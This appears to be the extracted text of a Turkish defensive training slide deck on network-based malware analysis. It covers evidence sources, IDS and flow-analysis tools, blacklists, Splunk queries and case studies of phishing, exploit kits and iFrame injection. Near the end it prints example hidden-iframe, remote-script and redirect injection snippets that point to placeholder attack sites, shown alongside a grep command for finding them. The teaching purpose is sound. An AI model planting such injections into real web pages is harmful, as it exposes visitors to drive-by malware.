Upload
others
View
7
Download
0
Embed Size (px)
Citation preview
TÜBİTAK BİLGEMSiber Güvenlik Enstitüsü
13 Ocak 2016
Ağ Üzerinde Zararlı Yazılım Analizi
Ağ Üzerinde Zararlı Yazılım Analizi
2
Tanım
• Bilgisayar ağlarının herhangi saldırı ve zararlı faaliyete karşın izlenmesi ve analiz edilmesi
Amaç
• Şüpheli bağlantı ve zararlı yazılım tespiti
• Saldırı kaynaklarını araştırma
Yöntem
• Kurum içine ve dışarı yapılan ağ bağlantıların sistematik olarak incelenmesi
Kaynaklar
• Kaydedilmiş Ağ Trafiği (PCAP)
• Saldırı Tespit Sistemi Kayıtları
• İçerik Filtreleyici Kayıtları
• Güvenlik Duvarı Kayıtları
• Ağ Akış Bilgisi Kayıtları
Ağ Analizi | Metodoloji
3
Bilgi Edinme
•Olay ne zaman ve nasıl gerçekleşti?
•Ortam ve organizasyon hakkında bilinmesi gerekenler
Strateji
•Önceliklendirme
Delil Toplama
•Not Tutma
•Delil Muhafaza Etme
Analiz
•İlişkilendirme
•Zaman Tüneli
•Ek delil toplama
Raporlama
•Dökümantasyon
Ağ Analizi | Delil Toplama
4
Kanıt Elde etme Saklama Sağlayacağı bilgiler
Analiz etmek için
kullanılacak
araçlar
Tipik kullanım
PCAP
Ağ üzerindeki
makinalar, tap cihazları
ve ağ üzerindeki bitleri
okuyabilecek her hangi
bir alet
Çok fazla saklama alanı
işgal eder. Saklama
cihazları için ek maliyet
harcamanız gerekebilir.
Ağ üzerinden geçen
verinin tamamına
erişebilirsiniz.
Wireshark, güvenlik
duvarı, içerik analiz
araçları vb.
Derinlemesine
incelemelerde, saldırganın
gerçekleştirdiği atakların
tespitinde kullanılır.
Ağ akışı
Uygulamalar ve flow
çıkaran araçlar
(anahtarlama ve
yönledirici cihazlar)
Az miktarda saklama
gereksinimi duyar.
Büyük ağ paketlerini
özetler.
Bağlantılar, gönderilen
veri miktarı, zaman, vb
hakkında özet bilgiler
sunar.
Silk, Argus, vb.
Saldırganın ve ele geçirilen
sistemlerin tespitinde
kullanılır.
Olay
kayıtları
/Uyarılar
Olay kayıtı üretebilecek
her uygulamadan ya da
bu uygulamaların
gönderdiği olay kayıt
sistemleri
Genellikle olay kayıt
yapan cihazlar üzerinde
bulunabilir. Bununla
birlikle merkezi olay
kayıt yönetim
sistemlerince saklanır.
Belirlenen kriter
haricindeki bir güvenlik
olayı hakkında bilgi
sunar.
Splunk, Arcsight,
SIEM’s
Yüksek öncelikli olaylar
hakkında uyarılarda
bulunur ve saldırganın, ele
geçirilen sistemlerin
tespitinde kullanılır.
Ağ Analizi - Zorluklar - 4V
5
Volume
• Büyük Ağ Verisi (GB’s)
Velocity
• Yüksek Veri Akışı
Variety
• Farklı Protokoller
Variability
• Geçici, uçucu bilgiler
Ağ Analizi Genel Yaklaşımı
6
Olay ne zaman, nasıl ve nerede
gerçekleşti?
Zaman Tüneli
ÖnceliklendirmeOlayın kaynağı
kim?
İlişkilendirme
Analiz Aşamaları
7
1
Trafik kaydetme vefiltreleme
• Trafiği STS’den geçirme
• Trafik filtreleme
• Metadata, Flow, PCAP analizi
2
Tehdit istihbaratı – IP / alan adı kara listeleri
• Bağlantıların IP kara listeleriyle karşılaştırılması
• Tehdit istihbaratı (IOC)servis kontrolü
3 4
Antivirüs taraması
• Trafikten şüpheli uzantılı (.exe, .js, .zip, .rar vb.) dosyalarınçıkarılması
• Antivirüs sisteminde dosya taratılması
İstatistiksel korelasyon ve tablolar
• İstatistikler, tablolar ve korelasyon analizleri
• Snorby• Nfsen• Splunk
Bilgisayar Analizi Paylaşımı• Ağ trafiğinden elde edilen
bulguların bilgisayar analizi için paylaşılması
5
Saldırı Tespit/Engelleme Sistemleri
8
• Yüksek performanslı çalışabilme
• Gigabitler seviyesinde ağ trafiğini işleyebilmesi
• HTTP isteklerini, TLS el sıkışmalarını, SSH bağlantılarını kaydedebilme
• Trafikten dosya ayıklama
• Endüstri standartlarınca belirlenen formatlarda çıktı üretebilme (Unified2 vb.),
• Gelişmiş kural setine sahip olması (ET-ET Pro)
• IP itibar (reputation) desteğinin olması
Suricata IDS
• Bileşim sistemlerine sızma denemeleri
• Ağdaki sistemlere zarar verecek her tür saldırılar
• DDOS
• Yetkisiz erişim
• Yazılım ya da donanımsal çözümler olarak sunulmaktadır.
• İmza tabanlı çalışır.
• Kural setleri mevcuttur.
STS özellikleri
Saldırı Tespit/Engelleme Sistemleri
9
Bro açık kaynak;
• Ağ programlama betik diline sahip,
• Tüm HTTP trafiğini (sunucu/istemci istek ve cevapları, mime türleri, uri vb.), DNS istek ve cevaplarını, SSL sertifikalarını, SMTP oturumlarını, FTP trafiğini çözümleyerek kaydedebilmektedir. Ayrıca ağ akışını da kayıt altına almaktadır.
Bro IDS - Ağ Analiz Framework
• Sourcefire tarafından geliştirilen açık kaynak kodlu bir saldırı tespit ve önleme sistemi• Dünya genelinde en çok kullanılan saldırı tespit sistemlerden biri, Linux ve FreeBSD • Snort Modları
• Sniffer• Packet logger
Snort IDS
IDS Sistemleri Eksiklikleri
10
• Özellikle exploit tabanlı imzaların doğruluk problemleri• Bilinmeyen anomali (0-day) ve sızmalara karşı etkisiz kalması• Adli analiz veya saldırı analizi için kaliteli bilgi sağlamaması
• Saldırı kapsamı / Hedef / Strateji , saldırı ( botnet ) boyutuvb.
• Kasıt olmayan anomalilerle kötü niyetli olayları ayırt edememesi• Sistemsel arıza ve problemler
Ağ Paketi Yakalama/Analizi
11
• Komut satırı paket analiz aracı ve dinleyicisi
• Wireshark ile beraber sisteme kurulmaktadır.
tshark
• Unix/Linux sistem üzerinde ön tanımlı
• Komut satırı paket analiz aracı ve dinleyicisi
Tcpdump
• Arayüze sahip paket analiz aracı
• Standart paket dinleme aracı
• Windows & Linux
Wireshark
• Windows tarafından geliştirilmektedir.
• Process tabanlı ağ trafiği incelemeye olanak sağlar.
Microsoft Message Analyzer
Ağ Analizi | Ağ Akış Bilgisi (Flow Data)
12
• Kaynak sistemden hedefe gönderilen paketlerin veri içeren kısımları işlenmeden özet bilgi sunar.
o Kaynak IP
o Hedef IP
o Kaynak port
o [TCP, UDP veya 0 (TCP ya da UDP trafiği değilse)]
o Hedef port
o IP protokolü
o Ağ akışı boyutu ve paket sayısı
o IP servis tipi
• Ağ Akış Protokolleri
• NetFlow (Cisco)
• sFlow (HP)
• IPFIX (Herhangi bir üretici firmaya özel bir protokol değildir.)
Ağ Akışı (Flow Data)
Ağ Analizi | Ağ Akış Bilgisi (Flow Data)
13
Netflow
• Cisco tarafından geliştirilmiş bir ağ akış protokolü
• Cisco IOS haricinde, Linux, BSD ve Solaris platformlarında da desteklendiği için bir standart halini almıştır.
• Ağ akışı 7 temel değerden oluşur.
sFlow
• HP marka cihazlar tarafından kullanılan ağ akış protokolü
IPFIX
• IP Flow Information Export, herhangi bir üretici firmaya özel bir protokol değildir.
• Netflow v9 ile büyük oranda benzerlik gösterir.
• Aslında Netflow protokolünün farklı türde cihazların kullanılabilmesi için esnetilmiş hali denebilir.
• IPFIX protokolü Juniper, Nortel, SonicWALL, Extreme, NTOP, Plixer gibi ürünler tarafından desteklenmektedir.
Ağ Akışı (Flow) Analizi Araçları
14
• Ağ akışı verileri bir web arayüzü ile görüntülenebilmektedir.
Nfsen
• Kaynak sistemden hedefe gönderilen paketlerin veri içeren kısımları işlenmeden özet bilgi sunar.
• Ağ Akış Protokolleri
• NetFlow (Cisco)
• sFlow (HP)
• IPFIX (Herhangi bir üretici firmaya özel birprotokol değildir.)
Ağ Akışı (Flow Data)
• Flow Basic Analysis Tool
• Ağ akışı görselleştirme, analiz, sorgulama, korelasyon aracı
FLOWBAT
• CERT NetSA (CERT Network Situational Awareness Team) tarafından geliştirilmiş ağ akış bilgisinin toplanmasını ve işlenmesini sağlayan bir yazılımdır.
Silk
Tehdit İstihbaratı – IP / Alan Adı Kara Listeleri
IP Adresi / Alan adı Karalisteleri
• Gerçek zamanlı IP adresi / alan adı
tehdit bilgisi
• Otomatik olarak üretilme -
genelde günlük
• Çeşitli kaynaklar tarafından
oluşturulma - organizasyonlardan
özel şirketlere
• Farklı durumlar için faydalı:
– İP skorlama, sınıflandırma
– Enfekte olmuş sistemlerin tespiti
– Yüksek riskli bağlantılar için uyarı
15
Antivirüs Taraması
16
Dosya Çıkarımı
• Trafikten şüpheli uzantılı (.exe, .js, .zip, .rar vb.) dosyaların çıkarılması
Antivirüs Taraması
• VirüsMü merkezi çoklu antivirus sisteminde tarama
• TÜBİTAK Siber Güvenlik Enstitüsü tarafından geliştirilen sistemde 20 farklı antivirüs aracıyla otomatik olarak taratılmaktadır.
• VirusTotal
Veri Toplama-Analiz-Görselleştirme
17
Farklı kaynaklardan gelen verileri ilişkilendirmek
Olay ile tespiti arasındaki süreyi kısaltmak
Genel eğilimler ve anormaliklerin tespiti
SONUÇ : Büyük veriden anlamlı sonuçlar çıkarmak
Veri Toplama-Analiz-Görselleştirme Araçları | Yaklaşım
18
Veriyi Tanımla
• Ne verisi?
• Hangi bilgileri içeriyor?
Veriyi Dönüştür
• Alan oluşturma
• Filtreleme
• Sorgulama
• Sınıflandırma
Veriyi Görüntüle
• Çizelgeler
• Tablolar
• Grafikler
• İstatikler
• Raporlar
Veri Toplama-Analiz-Görselleştirme Araçları
19
OSSEC HIDS – OSSIM SIEM
ELK (Elastic Search – Logstash - Kibana)
• Büyük verilerinin indekleslenmesi, analiz edilmesi ve görüntülenmesi
• Özellikle güçlü sorgulamaya yeteneğine sahip
Splunk
• Alarmların gelişmiş arayüzden görüntülenmesi
Snorby
• Web arayüzü vasıtasıyla filtreleme ve sorgulama
Moloch
20
source="/home/hasan/Desktop/data/http.log" | iplocation DestinationIP | lookup threatscore clientip as DestinationIP| search threatscore="1"
Sorgular
| timechart span=1h count --- count the number of events pr hour| timechart avg(delay) by host --calculate the average delay and trackeach host seperately| timechart avg(delay) min(delay) max(delay) --- calculate the average, minimum, and maximum delays per auto-bucket| top limit=50 users| top major_version, minor_version ---list the top 10 combiantions of majorand minor versions| top sourceby host --- list the top sources grouped by most fequently host| ctable DestinationIP --bütün threatscore değerlerine göre tablo oluşturur.|source="/usr/local/bro/logs/current/dns.log" | streamstats current=f last(_time) as next_time by Query | eval gap = next_time - _time | statscount avg(gap) var(gap) by Query|sourcetype=dns | eval Length=len(Query) | stats count(clientip) by Length | sort - Length
source="/usr/local/bro/logs/dns_filtered.log" | iplocation QueryIP | streamstats current=f last(_time) as next_time by Query | eval gap = next_time- _time | stats count avg(gap) var(gap) by Query | sort + var(gap)
İstatistiksel ve Görsel Analizler
21
Örnek Analizler
1 - Oltalama Saldırısı Ağ Analizi
23
Zararlı Bağlantı Kurulması
24
Exploit Aşaması
25
Zararlı Yazılımın Yüklenmesi
26
2 - Exploit Kit Yükleme ve Ağ Analizi
27
Sayfa ziyaretedilir.
Flash Player, Java ya da Silverlight
benzeriuygulamalar ileexploit çalışır.
Exploit çalışıncazararlı yazılım
sisteme yüklenir
IDS Alarm Oluşması
28
DHCP ve NBNS protokolü ile istemci tespiti
29
Web tarayıcıdan kurulan bağlantılar
30
HTTP istekleri ile Web tarayıcıdan yapılan istekler incelendiğinde zararlı alanadlarına yapılan bağlantılar görülmektedir.
Exploit Aşaması
31
Exploit Aşaması
32
Trafik Bulanıklaştırma (Obfuscation)
33
3 - iFrame Enjeksiyonları Analizi
34
• iFrame asıl HTML sayfası içerisinde bulunan ve kaynağını, yani içeriğini asıl sayfa dışında başka bir siteden alan çerçevelerdir.
• iFrame <iframe> </iframe> tagları ile belirtilir ve kapatılması zorunludur.
• Bir saldırı sitesine iframe yerleştirme :
<iframe frameborder="0" height="0" src="http://<saldırı-sitesi>/path/file" style="display:none" width="0"></iframe>
iFrame Enjeksiyon Örneği
35
Farklı Enjeksiyonlar
36
• Bir saldırı sitesinden komut dosyası çağıran veya çalıştıran JavaScript veyabaşka bir kodlama dili:
• Tarayıcıyı bir saldırı sitesine yönlendiren komut dosyaları
iFrame kodunu bulmak için [iframe] gibi kelimeleri aramak da yardımcıolabilir.
Örneğin, Unix tabanlı sistemlerde:
<script type='text/javascript' src='http://malware-attack-site/js/x55.js'></script>
<script>if (document.referrer.match(/google\.com/)) {window.location("http://malware-attack-site/");
}</script>
$ grep -irn "iframe" ./ | less
PNG Dosyası içine iFrame Enjeksiyonu
37
Sonuç - Bulguların Paylaşımı
38
Ağ Analizi
Bilgisayarve Zararlı
YazılımAnalizi
Teşekkürler